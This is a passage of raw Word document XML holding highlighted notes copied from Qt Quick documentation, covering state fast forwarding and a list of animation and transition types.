        <w:t>article has more information about creating state animations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2442" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>States and Transitions example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demonstrates how to declare a basic set of states and apply animated transitions between them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00490E7E" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2443" w:history="1">
        <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using Qt Quick Behaviors with States</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D911ED" w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explains a common problem when using Behaviors to animate state changes</w:t>
      </w:r>
      <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="005A2BD2" w:rsidRDefault="00D911ED" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2072" w:name="state-fast-forwarding"/>
      <w:bookmarkStart w:id="2073" w:name="_Toc483000979"/>
      <w:bookmarkStart w:id="2074" w:name="_Toc483003970"/>
      <w:bookmarkStart w:id="2075" w:name="_Toc483604321"/>
      <w:bookmarkStart w:id="2076" w:name="_Toc483605541"/>
      <w:bookmarkEnd w:id="2072"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State Fast Forwarding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2073"/>
      <w:bookmarkEnd w:id="2074"/>
      <w:bookmarkEnd w:id="2075"/>
      <w:bookmarkEnd w:id="2076"/>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In order for Transition </w:t>
      </w:r>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to correctly animate state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes, it is sometimes necessary for the engine to </w:t>
      </w:r>
      <w:r w:rsidRPr="00F462FB">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fast forward and rewind a state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (that is, internally set and unset the state) before it is finally applied. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>The process is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The state is fast forwarded to determine the complete set of end values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The state is rewound.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The state is fully applied, with transitions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F462FB" w:rsidRPr="00F462FB" w:rsidRDefault="00DC3801" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State transition realization //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some cases this may cause unintended behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a state that changes a view's</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or a Loader's</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sourceComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will set these properties multiple times (to apply, rewind, and then reapply), which can </w:t>
      </w:r>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be relatively expensive</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018577B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State fast forwarding should be considered an implementation detail, and may change in later versions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00365F6D" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2444" w:anchor="transitions-during-state-changes" w:history="1">
        <w:r w:rsidR="00365F6D" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html#transitions-during-state-changes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="00DC3801" w:rsidRDefault="0018577B" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2077" w:name="_Toc483000980"/>
      <w:bookmarkStart w:id="2078" w:name="_Toc483003971"/>
      <w:bookmarkStart w:id="2079" w:name="_Toc483604322"/>
      <w:bookmarkStart w:id="2080" w:name="_Toc483605542"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animation and Transitions in Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2077"/>
      <w:bookmarkEnd w:id="2078"/>
      <w:bookmarkEnd w:id="2079"/>
      <w:bookmarkEnd w:id="2080"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="0018577B" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2081" w:name="animation-and-transitions-types"/>
      <w:bookmarkStart w:id="2082" w:name="_Toc483000981"/>
      <w:bookmarkStart w:id="2083" w:name="_Toc483003972"/>
      <w:bookmarkStart w:id="2084" w:name="_Toc483604323"/>
      <w:bookmarkStart w:id="2085" w:name="_Toc483605543"/>
      <w:bookmarkEnd w:id="2081"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Animation and Transitions Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2082"/>
      <w:bookmarkEnd w:id="2083"/>
      <w:bookmarkEnd w:id="2084"/>
      <w:bookmarkEnd w:id="2085"/>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2445" w:anchor="transition" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transition</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates transitions during state changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2446" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>SequentialAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Runs animations sequentially</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2447" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>ParallelAnimation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Runs animations in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2448" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behavior</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Specifies a default animation for property changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2449" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAction</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Sets immediate property changes during animation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2450" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PauseAnimation</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Introduces a pause in an animation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0018577B" w:rsidRPr="0018577B" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2451" w:history="1">
        <w:r w:rsidR="0018577B" w:rsidRPr="0018577B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SmoothedAnimation</w:t>
        </w:r>
      </w:hyperlink>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color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- Allows a property to </w:t>
